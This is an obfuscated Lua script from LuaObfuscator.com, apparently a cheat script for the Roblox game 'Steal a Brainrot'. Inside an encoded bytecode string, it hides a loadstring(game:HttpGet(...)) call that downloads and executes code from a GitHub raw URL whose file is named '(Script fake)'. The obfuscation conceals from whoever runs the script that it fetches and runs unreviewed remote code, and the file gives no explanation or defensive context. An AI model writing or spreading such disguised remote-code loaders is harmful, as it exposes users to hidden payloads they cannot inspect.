--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v90=v5(v81,v19);v19=nil;return v90;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((929 -(214 + (830 -(32 + 85))))^(v32-(1 + 0))))%((1 + 1 + 0)^(((v33-(2 -1)) -(v32-(1638 -(1523 + 114)))) + (2 -1))) ;return v82-(v82%(1 -0)) ;else local v83=(4 -2)^(v32-(620 -(555 + 64))) ;return (((v31%(v83 + v83))>=v83) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==((180 -(67 + 113)) -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v35=351 -(87 + 263) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + (577 -427)) ;local v45=(v20(v43,2 -1 ,(478 -(416 + 26)) -16 ) * ((2 + 0)^32)) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,31);local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1;v44=0 + (0 -0) ;end elseif (v46==(3636 -1589)) then return ((v45==(0 + 0)) and (v47 * ((792 -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((20 -(5 + 5 + (13 -5)))^52))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v64=431 -(44 + 386) , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51== #"!") then local v86=(function() return 202 -(14 + 188) ;end)();local v87=(function() return;end)();while true do if (v86==(675 -(534 + 141))) then v87=(function() return 0 + 0 ;end)();while true do if (v87==(0 + 0)) then v56=(function() return v23();end)();v57=(function() return {};end)();v87=(function() return 1;end)();end if (v87~=(1 + 0)) then else for v105= #"]",v56 do local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (0==v106) then local v152=(function() return 0 -0 ;end)();while true do if (v152~=1) then else v106=(function() return 2 -1 ;end)();break;end if (v152==(0 + 0)) then v107=(function() return 0;end)();v108=(function() return nil;end)();v152=(function() return 1;end)();end end end if (v106==1) then v109=(function() return nil;end)();while true do if (v107==(1 + 0)) then if (v108== #"[") then v109=(function() return v21()~=(396 -(115 + 281)) ;end)();elseif (v108==(4 -2)) then v109=(function() return v24();end)();elseif (v108== #"xnx") then v109=(function() return v25();end)();end v57[v105]=(function() return v109;end)();break;end if (v107~=0) then else v108=(function() return v21();end)();v109=(function() return nil;end)();v107=(function() return 1;end)();end end break;end end end v55[ #"91("]=(function() return v21();end)();v87=(function() return 2;end)();end if (v87==2) then v51=(function() return 2;end)();break;end end break;end end end if (2~=v51) then else for v91= #",",v23() do local v92=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92==(2 -1)) then while true do if (v93==(0 -0)) then v94=(function() return v21();end)();if (v20(v94, #".", #"!")~=(867 -(550 + 317))) then else local v145=(function() return 0 -0 ;end)();local v146=(function() return;end)();local v147=(function() return;end)();local v148=(function() return;end)();while true do if (v145~=1) then else local v154=(function() return 0;end)();while true do if (v154~=1) then else v145=(function() return 2 -0 ;end)();break;end if (v154~=(0 -0)) then else v148=(function() return {v22(),v22(),nil,nil};end)();if (v146==(285 -(134 + 151))) then local v163=(function() return 1665 -(970 + 695) ;end)();local v164=(function() return;end)();while true do if (v163~=0) then else v164=(function() return 0 -0 ;end)();while true do if ((1990 -(582 + 1408))==v164) then v148[ #"91("]=(function() return v22();end)();v148[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v146== #">") then v148[ #"19("]=(function() return v23();end)();elseif (v146==(6 -4)) then v148[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v146~= #"xxx") then else local v169=(function() return 0 -0 ;end)();local v170=(function() return;end)();while true do if (0~=v169) then else v170=(function() return 0;end)();while true do if (v170~=(0 -0)) then else v148[ #"91("]=(function() return v23() -((1826 -(1195 + 629))^16) ;end)();v148[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v154=(function() return 1;end)();end end end if (v145==(0 -0)) then v146=(function() return v20(v94,2, #"xxx");end)();v147=(function() return v20(v94, #".dev",247 -(187 + 54) );end)();v145=(function() return 1;end)();end if (v145~=3) then else if (v20(v147, #"asd", #"xxx")== #"|") then v148[ #"asd1"]=(function() return v57[v148[ #".com"]];end)();end v52[v91]=(function() return v148;end)();break;end if ((782 -(162 + 618))~=v145) then else if (v20(v147, #"~", #"}")~= #"{") then else v148[2 + 0 ]=(function() return v57[v148[2]];end)();end if (v20(v147,2 + 0 ,2)~= #"\\") then else v148[ #"asd"]=(function() return v57[v148[ #"19("]];end)();end v145=(function() return 6 -3 ;end)();end end end break;end end break;end if (v92==(0 -0)) then local v103=(function() return 0;end)();while true do if (v103~=0) then else v93=(function() return 0 + 0 ;end)();v94=(function() return nil;end)();v103=(function() return 1637 -(1373 + 263) ;end)();end if (v103==1) then v92=(function() return 1001 -(451 + 549) ;end)();break;end end end end end for v95= #"[",v23() do v53[v95-#"\\" ]=(function() return v28();end)();end return v55;end if (v51==(0 + 0)) then local v88=(function() return 0 -0 ;end)();local v89=(function() return;end)();while true do if (v88==0) then v89=(function() return 0 -0 ;end)();while true do if (v89==1) then v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v89=(function() return 2;end)();end if (v89==0) then v52=(function() return {};end)();v53=(function() return {};end)();v89=(function() return 1385 -(746 + 638) ;end)();end if (v89~=2) then else v51=(function() return  #"\\";end)();break;end end break;end end end end end local function v29(v58,v59,v60) local v61=v58[1];local v62=v58[1 + 1 ];local v63=v58[3];return function(...) local v66=v61;local v67=v62;local v68=v63;local v69=v27;local v70=1 -0 ;local v71= -(342 -(218 + 123));local v72={};local v73={...};local v74=v12("#",...) -(1582 -(1535 + 46)) ;local v75={};local v76={};for v84=0 + 0 ,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 + (0 -0) ];else v76[v84]=v73[v84 + (561 -(306 + 254)) ];end end local v77=(v74-v68) + 1 + 0 ;local v78;local v79;while true do local v85=0 -0 ;while true do if (v85==(167 -(122 + 44))) then if ((77<=4230) and (v79<=(1470 -(899 + 568)))) then if ((v79<=1) or (3283==2211)) then if (v79>(0 + 0)) then local v110=v78[2];local v111=v76[v78[7 -4 ]];v76[v110 + (604 -((462 -194) + 335)) ]=v111;v76[v110]=v111[v78[12 -8 ]];else local v115=0;local v116;local v117;local v118;local v119;while true do if ((1850>=18) and (v115==(292 -(60 + 230)))) then for v156=v116,v71 do v119=v119 + (573 -(426 + 146)) ;v76[v156]=v117[v119];end break;end if ((0 + 0 + 0)==v115) then v116=v78[2];v117,v118=v69(v76[v116](v13(v76,v116 + 1 ,v78[1459 -(282 + 1174) ])));v115=812 -(569 + 242) ;end if ((1830<3669) and (v115==(2 -1))) then v71=(v118 + v116) -(1 + 0 + 0) ;v119=0 -0 ;v115=2;end end end elseif (v79>(1026 -(706 + 318))) then local v120;local v121,v122;local v123;local v124;v76[v78[1253 -(721 + 530) ]]=v60[v78[1274 -(945 + 326) ]];v70=v70 + (2 -(66 -(30 + 35))) ;v78=v66[v70];v76[v78[2 + 0 ]]=v60[v78[3]];v70=v70 + (701 -(271 + 429)) ;v78=v66[v70];v124=v78[2 + 0 + 0 ];v123=v76[v78[3]];v76[v124 + (1501 -(1408 + (1349 -(1043 + 214)))) ]=v123;v76[v124]=v123[v78[1090 -(461 + 625) ]];v70=v70 + (1289 -(993 + 295)) ;v78=v66[v70];v76[v78[1 + 1 ]]=v78[1174 -(418 + (2846 -2093)) ];v70=v70 + 1 + 0 ;v78=v66[v70];v124=v78[1 + 1 ];v121,v122=v69(v76[v124](v13(v76,v124 + 1 + 0 ,v78[1 + 2 ])));v71=(v122 + v124) -(530 -(406 + (1335 -(323 + 889)))) ;v120=1769 -(1749 + 20) ;for v149=v124,v71 do v120=v120 + 1 + 0 ;v76[v149]=v121[v120];end v70=v70 + 1 ;v78=v66[v70];v124=v78[1324 -(1249 + 73) ];v76[v124]=v76[v124](v13(v76,v124 + 1 + 0 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + (1146 -(466 + (1827 -1148))) ;v78=v66[v70];do return;end else do return;end end elseif ((v79<=(11 -6)) or (1430>=3612)) then if (v79==(11 -7)) then v76[v78[1902 -(106 + 1794) ]]=v60[v78[1 + 2 ]];else v76[v78[2]]=v78[1 + (582 -(361 + 219)) ];end elseif ((2683>=2460) and (v79>(17 -11))) then v76[v78[5 -3 ]]();else local v143=v78[116 -(4 + 110) ];v76[v143]=v76[v143](v13(v76,v143 + ((905 -(53 + 267)) -(57 + 527)) ,v71));end v70=v70 + (1428 -(41 + 1386)) ;break;end if ((v85==(103 -(17 + 86))) or (1804>=3275)) then v78=v66[v70];v79=v78[1 + 0 + (413 -(15 + 398)) ];v85=1 -0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6461766974726F2Q6C7A2F737465616C2D612D627261696E726F742F726566732F68656164732F6D61696E2F2853637269707425323066616B652900083Q0012033Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);